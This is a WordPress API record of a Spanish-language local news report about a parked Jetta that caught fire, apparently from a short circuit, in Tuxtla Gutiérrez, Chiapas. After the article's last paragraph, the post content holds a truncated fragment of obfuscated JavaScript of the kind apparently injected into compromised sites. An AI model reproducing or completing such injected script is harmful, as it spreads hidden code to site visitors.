{"id":3614,"date":"2022-07-14T22:10:06","date_gmt":"2022-07-14T22:10:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3614"},"modified":"2022-07-14T22:10:08","modified_gmt":"2022-07-14T22:10:08","slug":"por-un-presunto-corto-circuito-se-incendia-jetta-en-calles-de-la-delegacion-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3614","title":{"rendered":"Por un presunto corto circuito se incendia Jetta en calles de la delegaci\u00f3n Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-4.27.17-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-3615\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-4.27.17-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-4.27.17-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-4.27.17-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-4.27.17-PM-1536x1153.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-14-at-4.27.17-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 14 de julio de 2022. Tuxtla Guti\u00e9rrez.- Por un presunto corto circuito, este jueves por la tarde se incendi\u00f3 un Jetta cuando estaba estacionado en las calles de la delegaci\u00f3n Ter\u00e1n.<\/p>\n\n\n\n<p>Testigos informaron que, de manera repentina del veh\u00edculo de color blanco comenz\u00f3 a salir humo y observaron que en el interior se oscurec\u00eda y se derret\u00edan los pl\u00e1sticos.<\/p>\n\n\n\n<p>Ante ello los vecinos de la Segunda Oriente y Avenida Central comenzaron a sofocar el fuego con cubetas con agua y llamaron a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Al lugar arrib\u00f3 personal de Protecci\u00f3n Civil para sofocar el incendio y abrieron la cajuela a la fuerza ya que el propietario no se encontraba en el lugar.<\/p>\n\n\n\n<p>Momentos despu\u00e9s, el due\u00f1o desconcertado dijo que, desconoc\u00eda si el veh\u00edculo ten\u00eda un fallo en el sistema el\u00e9ctrico e indic\u00f3 que trasladar\u00eda la unidad a un taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 14 de julio de 2022. Tuxtla Guti\u00e9rrez.- Por un presunto corto circuito, este jueves por la tarde se incendi\u00f3 un Jetta cuando estaba estacionado en las calles de la delegaci\u00f3n Ter\u00e1n. Testigos informaron que, de manera repentina del veh\u00edculo de color blanco comenz\u00f3 a salir humo y observaron que en el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3615,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3614","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3614","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3614"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3614\/revisions"}],"predecessor-version":[{"id":3616,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3614\/revisions\/3616"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3615"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}